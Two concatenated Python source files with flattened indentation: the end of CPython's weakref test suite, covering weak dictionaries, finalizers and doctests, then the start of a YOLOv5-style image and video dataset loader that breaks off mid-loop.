self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
        # If a key isn't of a weakly referenceable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
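        # One thread copies the dict while another drops the only strong
        # references to the keys/values (collecting periodically), racing the
        # weakref removal callbacks against the copy.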
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(obj=a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weakly referenceable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
    except Exception:  # no EXIF data or no orientation tag
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
    # Make sure only the first process in DDP processes the dataset first, so the other processes can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
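        # DataLoader.__setattr__ refuses to rebind batch_sampler after __init__,
        # so bypass it and wrap the batch sampler in a never-ending repeater.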
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [
x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [
x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert (self.nf > 0), (
'No images or videos found in %s. '\
'Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats))
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (
self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
            cap = cv2.VideoCapture(int(s) if s.isnumeric() else s)  # numeric string -> local camera index
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
            thread = Thread(target=self.update, args=(i, cap), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [
letterbox(x, new_shape=self.img_size, auto=self.rect)[0]
for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
def img2label_paths(img_paths):
# Define label paths as a function of image paths
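            # e.g. 'coco/images/train/0001.jpg' -> 'coco/labels/train/0001.txt'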
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in img_paths]
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
assert len(self.img_files) > 0, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
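            # Each batch shares one target shape derived from its extreme aspect
            # ratio, so letterboxing to a stride multiple wastes minimal padding.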
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Check labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
